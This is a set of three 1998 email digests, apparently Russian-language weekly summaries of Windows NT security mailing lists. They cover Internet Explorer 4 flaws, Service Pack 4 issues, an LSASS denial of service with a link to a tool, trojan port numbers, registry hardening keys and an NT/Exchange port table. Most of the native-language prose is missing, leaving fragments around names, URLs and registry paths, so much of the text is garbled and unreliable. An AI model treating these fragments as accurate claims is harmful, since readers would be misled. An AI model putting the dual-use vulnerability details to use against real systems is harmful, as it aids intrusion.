From rudnyi@mch.chem.msu.su Mon Oct 26 10:22:07 1998
Received: from mch.chem.msu.su (mch.chem.msu.su [158.250.32.33]) by comp.chem.msu.su (8.8.5/8.7.3) with ESMTP id KAA17180; Mon, 26 Oct 1998 10:22:06 +0300 (MSK)
Received: from td.chem.msu.su (td.chem.msu.su [158.250.32.41])
	by mch.chem.msu.su (8.8.8/8.8.8) with SMTP id KAA14714;
	Mon, 26 Oct 1998 10:22:04 +0300 (MSK)
	(envelope-from rudnyi)
Resent-Date: Mon, 26 Oct 1998 10:22:04 +0300 (MSK)
Received: from comp.chem.msu.su (unverified [158.250.32.40]) by td.chem.msu.su
	(EMWAC SMTPRS 0.83) with SMTP id <B0000003980@td.chem.msu.su>;
	Mon, 26 Oct 1998 11:25:37 +0300
Received: (from rudnyi@localhost) by comp.chem.msu.su (8.8.5/8.7.3) id KAA17084 for security@td; Mon, 26 Oct 1998 10:21:58 +0300 (MSK)
Message-Id: <199810260721.KAA17084@comp.chem.msu.su>
Subject: =?koi8-r?Q?=C4=C1=CA=C4=D6=C5=D3=D4?= 12-18.10.98
To: security@td.chem.msu.su
Date: Mon, 26 Oct 1998 10:21:57 +0300 (MSK)
From: security@training.ru
X-Mailer: ELM [version 2.4ME+ PL31H (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Sender: security-request@td.chem.msu.su
Resent-Message-Id: <B0000003981@td.chem.msu.su>
Resent-From: security@td.chem.msu.su
X-Unsub: To leave, send text 'LEAVE' to <security-request@td.chem.msu.su>
Status: RO

   Windows NT

() 1998,   ,    

   http://www.training.ru/security/    
 security@training.ru

12 - 18  1998 

   "     Windows 
NT" (http://www.training.ru/security/book.htm)

- (challenge - response).   .  
  "",        
    "".  ,  "" 
      .


        (. ) 
   .

                                          ()
ntbugtraq                            17                             32    
ntsecurity (Cooper)                 53                              96
ntsecurity (iss)                     31                             94
ntsecurity (wwa)                     5                             10

    .

1.   IE4 -  
     

     Internet Explorer 4.01, 
    (   JavaScript 
        ). 

Troy Hoffman <troyh@ZENO.COM> (ntbugtraq)  
,    ,     
  (High security).     
     . 
   ,       
,     ,       
  .    , 
 ,      .  
,   ,     High security,   
  .

"Richard M. Smith" <rms@PHARLAP.COM> (ntbugtraq)    
 . Microsoft     
(http://www.news.com/News/Item/0,4,27482,00.html?st.ne.fd.mdh).  
 Mr. Cuartango      - 
. Richard M. Smith    ,  
 ,       Internet Explorer 
http://security.pharlap.com/cuart/test.htm.

James Strompolis <jimst@ENTERACT.COM> (ntbugtraq) ,  
Microsoft    IE 4.01 
(http://www.microsoft.com/ie/security/paste.htm).

2.     IE4

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     IE4, 
 Sune Hansen, <http://www.WorldWideWait.com>.   
  IP    w.x.y.z  
 32-      ,  
http://3475932041,  Internet Explorer 4.0 (SP1;2735 - 4.72.3110.8) 
  ,      
(Local Intranet Zone),       .

3.     MS Proxy 2.0

       MS Proxy 2.0 ("  
"     ).
 
Jason Garms <jasong@MICROSOFT.COM> (ntbugtraq) (ntsecurity, cooper) 
(ntsecurity, iss) ,       
    .  ,  
    (mnemonix@globalnet.co.uk),  , 
  Jason Garms,    .

4. 16-     
   NT

Ben Grubin <bgrubin@POBOX.COM> (ntbugtraq)  , 
   ,  16-    
    Windows NT    
FindFirst/FindNext.   -   32- .

5.    "  " - 
  Microsoft

   28  - 4  1998     
"  "   Token Ring (  
 RIF       Windows NT). Russ 
<Russ.Cooper@RC.ON.CA> ,   Teadrop2-fix  
  
(http://support.microsoft.com/support/kb/articles/q179/1/57.asp)

6.   Service Pack 4.0

MJE <mark@NTSHOP.NET> (ntbugtraq)    SP4  
Windows NT ftp://ftp.microsoft.com/bussys/winnt/winnt-
public/fixes/usa/nt40/ussp4/

7. SCOPY

Victor.DIAS-FERNANDES@DG12.CEC.BE (ntsecurity, cooper)   
     scopy   Windows NT.  
 

Scopy \\server\d$\home\user . /s

   c:\temp.        
        ( 
 ,    ).   
   scopy   ,   ,  
         
  c:\winnt.   ,    
 c:\winnt   ,      
!

:         
  scopy.

8.     
  

     
   .

Russ <Russ.Cooper@RC.ON.CA> (ntsecurity, cooper)     
  Peter Gutmann "Secure Deletion of Data from Magnetic 
and Solid-State Memory" 
http://www.cs.auckland.ac.nz/~pgut001/secure_del.html.

"James S. Rothfuss" <jsrothfuss@LBL.GOV> (ntsecurity, cooper) ,  
 6th USENIX Security Symposium    Peter Gutmann 
,         
   (    
)   5-10  .

http://www.usenix.org/publications/library/proceedings/sec96/gutmann.html

David P Gilliam <david.p.gilliam@JPL.NASA.GOV> (ntsecurity, cooper) 
     .   
      (DoD 5200.28-STD)  
   ,        
     . David P Gilliam 
,         
  .

Scott A Crosby <crosby@QWES.MATH.CMU.EDU> (ntsecurity, cooper) 
 ,        
comp.risks - http://catless.ncl.ac.uk/Risks.

9. SMB   

Stefano Avagliano <turkey_trip@GEOCITIES.COM> (ntsecurity, cooper) 
   "SMB signature".

Werner Helbig <Werner.Helbig@GLOBALKNOWLEDGE.CH> (ntsecurity, 
cooper)     

ftp://ftp.microsoft.com/developr/drg/CIFS/

 :   "    
 Windows NT" (http://www.training.ru/security/book.htm)  
   .

10.  ,    
  Server Manager

      Tony Haw 
<tonyhaw@ROCKETMAIL.COM> (ntsecurity, cooper)    


Net config server /hidden:yes

        .

David Bovee <dbovee@NW.VERIO.NET> (ntsecurity, cooper) ,  
          
  ,       
.  ,        , 
- .

11.  SU  CHOWN for NT

     SU  CHOWN   
 "Brett A. Funderburg" <brettf@ACTIVERSE.COM>   
:

  SU  NT (  )
http://www.bmrc.berkeley.edu/people/chaffee/winntutil.html

 Unix   Windows (Unix95_7.zip)
http://www.itribe.net/virtunix/mystuff.html

12.   

"Mohamed .M Abdalla" <mabdalla@STARNET.COM.EG> (ntsecurity, cooper) 
,  ,     Windows NT  
   Winlogon.

Jeremy Sullivan <jsulli@ACXIOM.COM> (ntsecurity, cooper)  
 

HKEY_LOCAL_MACHINE
 SOFTWARE
  Microsoft
    Windows NT
     CurrentVersion
      Winlogon
        DontDisplayLastUserName

    1.

13.    

"Carter, Adam" <adamca@SIINET.TRW.COM> (ntsecurity, cooper)   
   ,      
     .

David P Gilliam <david.p.gilliam@JPL.NASA.GOV> (ntsecurity, cooper) 
  Invormation Security Policies Made Easy,  
Charles Cresson Wood (www.baselinesoft.com),      
($500).

"Mark T. Edmead" <mark@MTESOFT.COM> (ntsecurity, cooper) 
  SANS Windows NT Security Step-by-Step,  
    www.sans.org.

Raj Mathur <raju@SGI.COM> (ntsecurity, cooper)    RFC 
2196: Site Security Handbook.

"Henry, James" <jwhenry@BECHTEL.COM> (ntsecurity, cooper)  
  ,     
.

www.ciac.org   the US DOE Computer incident and Advisory Capability site
www.cert.org   computer emergency response team type site
www.first.org   Forum of Incident Response and Security Teams

14.    

"Schmetz, Leon" <Leon.Schmetz@nl.origin-it.com> (ntsecurity, iss) , 
             
,        .

Tim Biles <tbiles@d.umn.edu> (ntsecurity, iss) ,   
    ,      .  
    ,      
         .

15. MS GINA.DLL

Valentine Perepelitsa <valik@MMDATA.KHARKOV.COM> (ntsecurity, 
cooper)      Graphical Identification and 
Authentication (GINA).  ,     ,    
MSDN,        STOP ( ).

Daniel M. Deakin, ddeakin@acsu.buffalo.edu (ntsecurity, cooper)   
  

[HKEY_LOCAL_MACHINE\SOFTWARE|Microsoft\Windows 
NT\CurrentVersion\Winlogon]
"GinaDLL"="YourGina.dll"

      GINA.

16.  106

"Guido Manzino" <gmanzino@tin.it> (ntsecurity, iss) ,   
 NT4+SP3   RAS  SLMail    106. 
   telnet      200 hello.

Jon Larimer <jlarimer@iss.net>  "James Strompolis" <jimst@enteract.com> 
(ntsecurity, iss) ,   106 -   poppass,  
     POP3.   , 
     SLMail .

17.     
 

Mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq) (ntsecurity, iss) 
,    WAR-ftp      
       waruser.dat.  
Juha Jykk (ntbugtraq) <juolja@UTU.FI>    , 
     1.66x4.


From rudnyi@mch.chem.msu.su Sun Nov  1 19:06:25 1998
Received: from mch.chem.msu.su (mch.chem.msu.su [158.250.32.33])
	by comp.chem.msu.su (8.9.1/8.9.1) with ESMTP id TAA07568;
	Sun, 1 Nov 1998 19:06:23 +0300 (MSK)
Received: from td.chem.msu.su (td.chem.msu.su [158.250.32.41])
	by mch.chem.msu.su (8.8.8/8.8.8) with SMTP id TAA07844;
	Sun, 1 Nov 1998 19:06:14 +0300 (MSK)
	(envelope-from rudnyi)
Resent-Date: Sun, 1 Nov 1998 19:06:14 +0300 (MSK)
Received: from comp.chem.msu.su (unverified [158.250.32.40]) by td.chem.msu.su
	(EMWAC SMTPRS 0.83) with SMTP id <B0000004085@td.chem.msu.su>;
	Sun, 01 Nov 1998 19:07:23 +0300
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id TAA07543
	for security@td; Sun, 1 Nov 1998 19:06:07 +0300 (MSK)
Message-Id: <199811011606.TAA07543@comp.chem.msu.su>
Subject: digest 19-25.10
To: security@td.chem.msu.su
Date: Sun, 1 Nov 1998 19:06:06 +0300 (MSK)
From: security@training.ru
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
X-MIME-Autoconverted: from 8bit to base64 by comp.chem.msu.su id TAA07543
Sender: security-request@td.chem.msu.su
Resent-Message-Id: <B0000004086@td.chem.msu.su>
Resent-From: security@td.chem.msu.su
X-Unsub: To leave, send text 'LEAVE' to <security-request@td.chem.msu.su>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from base64 to 8bit by comp.chem.msu.su id TAA07568
Status: O

   Windows NT

() 1998,   ,    

   http://www.training.ru/security/    
 security@training.ru

19 - 25  1998 

   "     Windows 
NT" (http://www.training.ru/security/book.htm)

  (private key) -      
.        . 
       
.

    (. ).     
    Windows NT (SP4),    
  .

                                          ()
ntbugtraq                           43                             72    
ntsecurity (Cooper)                87                             141
ntsecurity (iss)                    55                            136
ntsecurity (wwa)                     3                              6

    .

1.   Service Pack 4.0

   SP4.      . 
   - SP4?     ?

1.1.   

Prakash Uttam <pculist@BIGFOOT.COM> (ntbugtraq) ,    
    Intel-.

NT4SP4I.EXE (32MB)       
  Year2000  IE4, Data Access Components,  Site
Server.

NT4Y2K4I.EXE (75MB)  NT4SP4I   IE4.0SP1  
 Y2k, DAC 2.0 SP1   Y2k,   
 Site Server  SSX3   Y2k. (Y2K = Year 2000).

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,    SP4 
 Security Configuration Editor,       
SP4,   CD,       .

    SP4  40-. 128- 
     

http://mssecure.www.conxion.com/cgi-bin/ntitar.pl

  SP4    Terminal Server Edition 
(    ).   NT 4.0 
Enterprise Edition, SP4  .

Jason Garms <jasong@microsoft.com> (ntsecurity, iss) ,  
Security Configuration Manager (SCM) (   Security 
Configuration Editor)    SP4,   CD.  
 ,  SCM        
 ,    .

1.2.  

 

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/ussp4/

,         
(  Microsoft). ,     , 
   .

http://www.ngn.nl/bui
http://support.microsoft.com/download/support/mslfiles/
ftp://198.105.232.37/fixes/usa/ussp4/
http://www.sunbelt-software.com/downlibr.htm
ftp://ftp.beernuts.net/nt40serv/
ftp://ftp.spiceisle.com/common/ibm_pc/Microsoft/NT4/
http://jules.egr.msu.edu/sp4.html
http://www.cns.uni.edu/~pola/nt
ftp://ftp.mplik.ru/pub/win32/NT40/servicepack/
ftp://ftp.ra.pae.osd.mil/pub/nt40/
http://www.ra.pae.osd.mil/~ftp/nt40/

1.3.  ,   

Steve Manzuik <steve.manzuik@TELUS.COM> (ntbugtraq) (ntsecurity, iss) 
(ntsecurity, wwa) ,      SP4.  
,    SP4  LSASS.EXE DoS .  
  .   
NT+SP3+  LSASS DoS.   .  
  SP4.  !

Glenn Larsson <glennlarsson@HOTMAIL.COM> (ntbugtraq) ,  
 SP4   .

"LSA2-FIX"      Q182918  Q184017,   
  SP4.       
LSASS

Q154087 Access Violation...
Q174205 LSASS May Use a Large Amount of Memory...
Q183886 Access Violation in LSASS...

1.4.  

George <georger@NLS.NET> (ntbugtraq)      
  SP4.

http://www.nthelp.com/nt4sp4.htm

"Micheal Espinola Jr" <micheale@ix.netcom.com> (ntsecurity, iss) ,  
   ,     SP4  NT4 
Enterprise Edition server   .   
 ,      

"NTOSKRNL.EXE cannot be found or is corrupt, please install another copy of
this file"

1.5. SP4  Option Pack

Frank Xavier Ledo <kermit@THECLUEPHONE.COM> (ntbugtraq)   
  Option Pack   SP4.

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)   
.

NT 4.0
SP4
IE 4.01x (optional)
NT Services (anything from the NT CD)
NT 4.0 Option Kit
Re-apply SP4

Forrest Gibson <fgibson@HIGHWIRE.COM> (ntbugtraq) ,   
     

1) NT
2) SP4
3) RRAS
3) IE401sp1
4) IIS
5) SP4

    .

2.     IE4

    ,     IP- 
    ,  http://3475932041,   
 Internet Explorer 4.01 ,     
  Local Intranet Zone.

Paul Ashton <paul@ARGO.DEMON.CO.UK>  Aleph One 
<aleph1@DFW.NET>(ntbugtraq)      
  (Local Intranet Zone)    (Internet Zone) ( 
      ).  
    

User authentication->Logon
"Automatic logon only in intranet zone"

  Internet Explorer       
   .

Ollie Whitehouse <Ollie@DELPHISCONSULT.CO.UK> (ntbugtraq) , 
       hosts,  I.E 5 (5.00.0518.10) 
,        .

Norbert Luckhardt <nl@CT.HEISE.DE> (ntbugtraq) ,   
    "add all local sites which are not listed in 
anotherzone".         "local intranet 
zone"/add sites,    .

Marc Bejarano <marc@DELTA-GLOBAL.COM> (ntbugtraq) ,  
   Microsoft.

"Dotless IP Address" Issue in Microsoft Internet Explorer 4.
http://www.microsoft.com/security/bulletins/ms98-016.asp

"James Strompolis" <jimst@enteract.com> (ntsecurity, iss)   
 

http://www.microsoft.com/ie/security/dotless.htm

Microsoft Knowledge Base (KB) article Q168617, Update Available for Dotless 
IP Address Security Issue, 
http://support.microsoft.com/support/kb/articles/q168/6/17.asp

3.   

fill <fill@TCHERCOM.RU> http://www.chat.ru/~fewsoft/ (ntbugtraq)  
 ,    Windows NT 
 .   ,    
  Win32,    .   SP4 
 .

4.     IIS 
4.0

Jerry Sievert <jerry@EASYSTREET.COM> (ntbugtraq) ,   
   (header)  IIS 4.0,    
     . ,

   Server: Microsoft-IIS/4.0
   Date: Wed, 21 Oct 1998 17:12:02 GMT
   Cache-control: public
   Content-Type: text/html
   Set-Cookie: 
ASPSESSIONIDGGGQGGEP=GELLKKADICCFLMIIDDDMIIFG; path=/
   Cache-control: private
   Transfer-Encoding: chunked

 ,  Cache-control .   Apache Week 
(http://www.apacheweek.com/)     IIS 4.0

(http://www.apacheweek.com/issues/98-09-04#status)

     "HTTP/1.0 200 OK"   
.

5.    MS 
Proxy 2.0

"Mulherin, Jon SFC" <mulherin@HQ.HQUSAREUR.ARMY.MIL> (ntbugtraq) 
,      MS Proxy 2.0    
SQL   ODBC   .  
   MS Proxy 2.0 ,   
      

Event ID: 103
Source:  WebProxyLog
Message:  The server was unable to open ODBC Data Source proxysql.  Table
mspsrvlog, under user name sa.  The ODBC error is:
??????????????????????????.  The data is the error code.

    -,   
 .        
 

Event ID: 107
Source:  WebProxyLog
Message:  The server failed to log information.  The log object was never
created possibly due to wrong configuration.

6.   

Gregg Branham <greggb@ALTUSNET.COM> (ntbugtraq)    
 ,     
  Windows NT.

http://www.altusnet.com/spcheck.htm

john <john@UNT.EDU> (ntbugtraq) ,     
.

http://www.cas.unt.edu/~john/projects.html

7.    

Bill Potvin, II <bpotvin@MERXSOFT.COM> (ntsecurity, cooper) ,  
   ,   .   
,       .

     . 

1)    .

Frank Heyne <fh@RCS.URZ.TU-DRESDEN.DE> (ntsecurity, cooper) , 
    Elwiz (http://www.heysoft.de/)   
  .       
.

Courteney van den Berg <cjv@RBMI.ORG> (ntsecurity, cooper)  
  pulist  Resource Kit NT.

2)    .

Michael Jones <mjone4@AMFAM.COM> (ntsecurity, cooper)   
Server Manager.   ,    Win32::NetAdmin  perl 5 
  LoggedOnUsers(server, userRef).

jrtietsort <jrtietsort@MICRON.COM> (ntsecurity, cooper)  
  net session.

8.   

Phil Cox <pcc@LLNL.GOV> (ntsecurity, cooper) ,   
     Windows NT.

"McGregor, Byron" <BMcGregor@BCBC.BC.CA> (ntsecurity, cooper) , 
     netsvc.exe  Resource Kit NT.

Eimis <eimis@NOMAGIC.COM> (ntsecurity, cooper)  
  Service Manager NT 1.31, http://www-
rnks.informatik.tu-cottbus.de/~fsch/english/srvmgr.htm.

Beau Monday <BMonday@BSQUARE.COM> (ntsecurity, cooper)   
 Server Manager,   ,     
 ,    .

9.   NTFS  NT 5.0

     2 Windows NT 5.0,   
    NTFS. "Haynes, Andrew J (DPR)" 
<haynesaj@BP.COM> (ntsecurity, cooper)    NT 
4.0  NT 5.0 (beta 2).

NT5 Beta2       NTFS5,  
   .   NTFS5   
 NT 5.0   .

      NTFS5,   
     NT 4.0    
NTFS.SYS.   NT 4.0       
    . ,   NT 4.0   
SP3.

      NT 4.0   
SP3,        NTFS.SYS 
   NT5 Beta2.

 David LeBlanc <dleblanc@MINDSPRING.COM> (ntsecurity, cooper) 
,      NTFS   NT 5.0 
Beta2  ,     .

Andreas Klein <andrekl@MICROSOFT.COM> (ntsecurity, cooper) , 
 SP4  Windows NT     NTFS.SYS,  
     NTFS.       
SP4.

 Jason Zions <jason_zions@interix.com>  "John Taylor" 
<john@carrhouse.force9.co.uk>(ntsecurity, iss)    
.   David LeBlanc,  ,    
    NTFS   NT 5.0 Beta2.

10. 40  128-

Thomas Vogler <tvo@software-ag.de> (ntsecurity, iss) ,   
  , 40-  128-,    NT.

"Loa'y Assaf" <lassaf@owss.com> (ntsecurity, iss) ,    
,   SChannel.dll (%WINROOT%\System32\).  
  Version  "Export Version",   40- 
,  "Domestic Version",  128-.

jpfo@mail07.mitre.org (Jean-Paul F. Otin, A150) (ntsecurity, iss) ,  
        .

etexch32.dll
rsabase.dll
ndiswan.sys
ntlmssps.dll
security.dll
rsaenh.dll

 128-     
 Version

"US and Canada Use Only"
"US/Canada Only"
"Domestic Use Only"

"Gary Smith" <gary_j_smith@hotmail.com> (ntsecurity, iss)  

http://www.fortify.net

        
    .

11.    DNS

"Guffey, Steven, SSgt, SAM-DSW" <GUFFEYS@COMM.HQ.AF.MIL> 
(ntsecurity, iss) ,  ,      
    nslookup      
.

frank.ledo@autodesk.com (ntsecurity, iss) ,     
       -  
          
 DNS.

 :      
 DNS    .     
  .

12. Identd  NT

Thomas Leitner <tom@finwds01.tu-graz.ac.at> (ntsecurity, iss)   
  

http://hem.passagen.se/akew/identd/

  RFC1413  NT.

13.    

 "Russell N. Hathhorn" <hathhorn@TELEPORT.COM> (ntsecurity, cooper) 
      ,     
.

Kurt Dillard <kurt@DILLARD.COM> (ntsecurity, cooper) ,   
       .  ,  
           
.    -    ,  
        
    Microsoft,  SPA.

"Haynes, Andrew J (DPR)" <haynesaj@BP.COM> (ntsecurity, cooper)  
  ,     .  ,  
           
 .     BDC   
,       PDC.  
 Microsoft       ,   
     ,   
  .

"Hilderbrand, Doug" <dhilderb@ELDEC.COM> (ntsecurity, cooper) , 
  ,   ,    . 
  Q153140    

c:\winnt\system32\cpl.cfg          on the PDC.
c:\winnt\system32\lls\llsuser.lls      on _ALL_ servers including the
PDC.

     ,     
 .

14.    

Glenn Larsson <glennlarsson@HOTMAIL.COM> (ntsecurity, cooper) 
,   ,         -
 NT.

Beau Monday <BMonday@BSQUARE.COM> Jim Francis 
<jnfranc@ERENJ.COM> (ntsecurity, cooper)    
  .      .

15.    

Glenn Larsson <glennlarsson@HOTMAIL.COM> (ntsecurity, cooper) 
   ,      
    Windows NT.

http://194.23.169.128/Cent.exe
http://194.23.169.128/NoSniff.exe

16.  Windows 95    


"Taylor, Robert A." <taylorra@FSSEC.ARMY.MIL> (ntsecurity, cooper) 
,          
  Windows 95   .

Paul L Schmehl <pauls@UTDALLAS.EDU> (ntsecurity, cooper) ,  
      W95 
(http://www.signal9.com/).      ,   
   -  .

17.    

      Joseph Pung 
<Pungj@MEIJER.COM> (ntsecurity, cooper)     
,      .

http://www.hr.doe.gov/ucsp/doeucsp.htm
http://www.dsd.gov.au/gateway/
http://dcas.ucdavis.edu/pubs/security/index.html
http://csrc.nist.gov/isptg/
http://guru.psu.edu/policies/POL_MENU.html
http://sysd.kennesaw.edu/polsample.htm

18.     
 

"McCann, Margaret B." <MARGARET.B.MCCANN@CPMX.SAIC.COM> 
(ntbugtraq) ,    Cheyenne ArcServe 6.5  
     . 
    Backup Operators  . Bill King 
<billk@VOICENET.COM> (ntbugtraq) ,    
 tsi.dll.

*********************************************************
   Sunbelt

    SPQuery,    ,  
         
.

http://www.sunbelt-software.com/spquery.htm


From rudnyi@mch.chem.msu.su Sun Nov  8 21:49:36 1998
Received: from mch.chem.msu.su (mch.chem.msu.su [158.250.32.33])
	by comp.chem.msu.su (8.9.1/8.9.1) with ESMTP id VAA01620;
	Sun, 8 Nov 1998 21:49:34 +0300 (MSK)
Received: from td.chem.msu.su (td.chem.msu.su [158.250.32.41])
	by mch.chem.msu.su (8.8.8/8.8.8) with SMTP id VAA01761;
	Sun, 8 Nov 1998 21:49:17 +0300 (MSK)
	(envelope-from rudnyi)
Resent-Date: Sun, 8 Nov 1998 21:49:17 +0300 (MSK)
Received: from comp.chem.msu.su (unverified [158.250.32.40]) by td.chem.msu.su
	(EMWAC SMTPRS 0.83) with SMTP id <B0000004187@td.chem.msu.su>;
	Sun, 08 Nov 1998 21:51:31 +0300
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id VAA01614
	for security@td; Sun, 8 Nov 1998 21:49:10 +0300 (MSK)
Message-Id: <199811081849.VAA01614@comp.chem.msu.su>
Subject: digest 26.10-1.11
To: security@td.chem.msu.su
Date: Sun, 8 Nov 1998 21:49:10 +0300 (MSK)
From: security@training.ru
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
X-MIME-Autoconverted: from 8bit to base64 by comp.chem.msu.su id VAA01614
Sender: security-request@td.chem.msu.su
Resent-Message-Id: <B0000004188@td.chem.msu.su>
Resent-From: security@td.chem.msu.su
X-Unsub: To leave, send text 'LEAVE' to <security-request@td.chem.msu.su>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from base64 to 8bit by comp.chem.msu.su id VAA01620
Status: RO

   Windows NT

() 1998,   ,    

   http://www.training.ru/security/    
 security@training.ru

26  - 1  1998 

   "     Windows 
NT" (http://www.training.ru/security/book.htm)

  (named pipe) -   SMB,  
        
,     .

  (. )      .  
,       ntsecurity (Cooper),  
    ntsecurity (iss).

                                          ()
ntbugtraq                           24                             45    
ntsecurity (Cooper)                28                              40
ntsecurity (iss)                    69                            168
ntsecurity (wwa)                     0                              0

    .

1.   Service Pack 4.0

  ,      
SP4.
1.1. SETUPDD.SYS

Frank Knobbe <FKnobbe@HOME.COM> (ntbugtraq) ,   
SETUPDD.SYS,      
   30MB  SP4,      
70MB .

1.2. LSA2-Fix

  ,    LSA2-Fix  SP4. 
 .

Glenn Larsson <glennlarsson@HOTMAIL.COM> (ntbugtraq) ,   
 ,  , LSA2-Fix   SP4.

"Steve Manzuik" <Steve.Manzuik@ldscal.com> (ntsecurity, iss)   
 , ,   LSASS DoS  
  SP4.

"Mark Y. Umerov" <MARK_U@central.nbu.com> (ntsecurity, iss) , 
   ,  ,    
LSASS DoS.

"Jon" <external@networkcommand.com> (ntsecurity, iss) ,   
LSASS DoS   Mnemonix,    
ubend.exe   

http://www.infowar.co.uk/mnemonix/utils.htm

1.3.  

Dmitrey Manakhov <DManakho@AIOCAZ.COM> (ntbugtraq) ,  
  SP4       
NT      ,    
   "You must change password next logon".  
     "UNABLE TO CHANGE 
PASSWORD ON THIS ACCOUNT (C00000BE). PLEASE
CONTACT YOUR SYSTEM ADMINISTRATOR".   
    SP4   NT.

"Katz-Braunschweig, Daniel" <DKatz@IONA.EDU> (ntbugtraq) 
,        NTLM v.2  
   .

http://support.microsoft.com/support/kb/articles/q147/7/06.asp

Paul Leach <paulle@MICROSOFT.COM> (ntbugtraq) ,   
      NTLM v.2,    
   .   ,    
  .      
.

"Ahearn, Shawn" <ahearn@OSI.SYLVANIA.COM> (ntbugtraq)  
   SP4.  ,      
.   SP4     SAM.  
   SP4,       
.     SP4   
  Samsrv.dll, Samlib.dll, Lsasrv.dll, Services.exe, Msv1_0.dll 
 Winlogon.exe.    SP3    
 ,        .

1.4. NT 4.0 Enterprise Edition

      ,    SP4  
NT 4.0 Enterprise Edition     STOP.  
  "John Charlesworth http://www.bellacoola.com/?hd" 
<jcharlesworth@bellacoola.com>  "Stephen Daedalus" 
<root@dionysus.dyn.ml.org> (ntsecurity, iss) ,    
128- SP4    NT 4.0 Enterprise Edition  .

1.5.  

Joseph Metzger <ibujam@MAINEX1.ASU.EDU> (ntbugtraq) ,  
 Adaptec's CDA1000.sys (Adaptec Raid Card Miniport Driver) 
  SP4.

dr john halewood <john@UNIDEC.CO.UK> (ntbugtraq) ,   
 SP4  NT c  HASP     
 .   ,   HASP  
 SP4.

Igor Lysenko <IgorL@BCC.KRASNODAR.RU> (ntbugtraq) ,  
  SP4        
 IIS 3.0. Francois Normant 
<fnormant@TECHNOLOGIA.CA> (ntbugtraq) ,      
  SP4.     
  SP4    IIS 3.0.

Michael Burgener <Michael_Burgener@BROOKSSOFTWARE.COM> 
(ntbugtraq) ,  Informix server   SP4.

Kevin Fries <kfries@CQUAD.COM> (ntbugtraq) ,  International 
Software Solution's Remote Services Management   SP4.

Micheal Espinola Jr <micheale@IX.NETCOM.COM> (ntsecurity, cooper) 
,   SP4      
 (hidden servers)       
  .

2.   Windows NT

Mike Epprecht <mike@ALBA.CO.ZA> (ntbugtraq)    
 Microsoft

http://www.microsoft.com/windows/dailynews/102898.htm

 ,    Windows NT 5.0   Windows 
2000.

3.     
Windows NT

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,    
"International Windows NT Fixes Up-to-date Query Engine"

<http://ntbugtraq.ntadvice.com/ntfixes.asp>

 .

4.    pwl   
   Windows 95

Hobe Industries <hobe_industries@HOTMAIL.COM> (ntbugtraq)  
,       pwl 
     Windows 95    
  .

:         
SMS,     W95      
PCMCIA       pwl.

:

    ,   ,    
.

      .   
     . W95 ,   
       .  
    . W95  
     .      
     SMS,     pwl.   
   ,      
    .

 Hobe Industries ,    ,   
  BIOS   .

Paul L Schmehl <pauls@UTDALLAS.EDU> (ntbugtraq) ,   
 BIOS       ,  
  .   BIOS,  ,  
  ,     ,  
    .

"Hollway, Mahlon J" <Mahlon.Hollway@PSS.BOEING.COM> (ntbugtraq) 
     ,   
    pwl    W95.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Policies\Network]
"DisablePwdCaching"=dword:00000001

5. Master's Paradise

"Mike Tavares" <vmiketa@ici.net> (ntsecurity, iss) ,   
 Master's Paradise,     
" " Back Orifice.

Jon Larimer <jlarimer@iss.net>, http://www.iss.net/,   . 
  Master's Paradise    TCP 40421, 
40422,  40423.   40422  40423  .  
   40421,     
  .  Master's Paradise   UDP 
3129,      ,   
 (      ).

  Master's Paradise   

HKCU\Software\Munich Brain House\Master's Paradise\

          
  ,  Master's Paradise   
.

6.  

Razvan Peteanu <rpeteanu@INTERLOG.COM> (ntsecurity, cooper)  
      Windows NT

http://oliver.efri.hr/~crv/security/bugs/NT/

Craig Keegan <Craig.Keegan@COLESMYER.COM.AU> (ntsecurity, cooper) 
   Windows NT Security & Event Log Management tools

http://www.scullin.starway.net.au/~ckeegan/index.html

David LeBlanc <dleblanc@MINDSPRING.COM> (ntsecurity, cooper) 
,           ISS 
Internet Scanner (     www.iss.net)    
Steve Sutton's NSA   www.trustedsystems.com.

7. ,   NT  Exchange

Max Westin (ntsecurity, iss) ,     
  Windows NT     Exchange.

"Micheal Espinola Jr" <micheale@ix.netcom.com> (ntsecurity, iss)  
  

Open Service Ports for WindowsNT, Terminal Server, & Exchange Server

Functionality                 UDP        TCP        IP
Browsing                      137,138
DHCP Lease                    67,68
DHCP Manager                            135
DNS Administration                      139
DNS Resolution                53
Exchange Administrator                  135
Exchange Client/Server Comm.            135
File Sharing                            139
IMAP                                    143
LDAP                                    389
LDAP (SSL)                              636
Logon Sequence                137,138   139
MTA - X.400 over TCP/IP                 102
NetLogon                      138
NT Diagnostics                          139
NT Directory Replication      138       139
NT Event Viewer                         139
NT Performance Monitor                  139
NT Registry Editor                      139
NT Secure Channel             137,138   139
NT Server Manager                       139
NT Trusts                     137,138   139
NT User Manager                         139
Pass Through Validation       137,138   139
POP3                                    110
PPTP                                    1723      47
Printing                      137,138   139
RPC                           135       135
SMTP                                    25
WINS Manager                            135
WINS Registration                       137
WINS Replication                        42

Robert Aitchison <raitchison@dsw.net> (ntsecurity, iss)   


IPMA4 over SSL (TCP 993)
POP3 over SSL (TCP 995)
SMTP over SSL (TCP 465)
NNTP (TCP 119)
NNTP over SSL (TCP 563) 
web server TCP Ports 80  443 (for SSL).

Paul Long <p.long@forbio.com.au> (ntsecurity, iss)  ,  
Exchange Server 5.5,  ,     
 1024  Directory Store  Information Store (  Outlook)  
    System Attendant (  Exchange 
Administrator).      135 (MS RPC).

      ,  
   Q176466 (TCP Ports and MS Exchange) Q155831 "How to
force Static Mapping of Sockets".

    Q179442 "How to configure a firewall for 
Winnt and trusts",  ,     <1024 
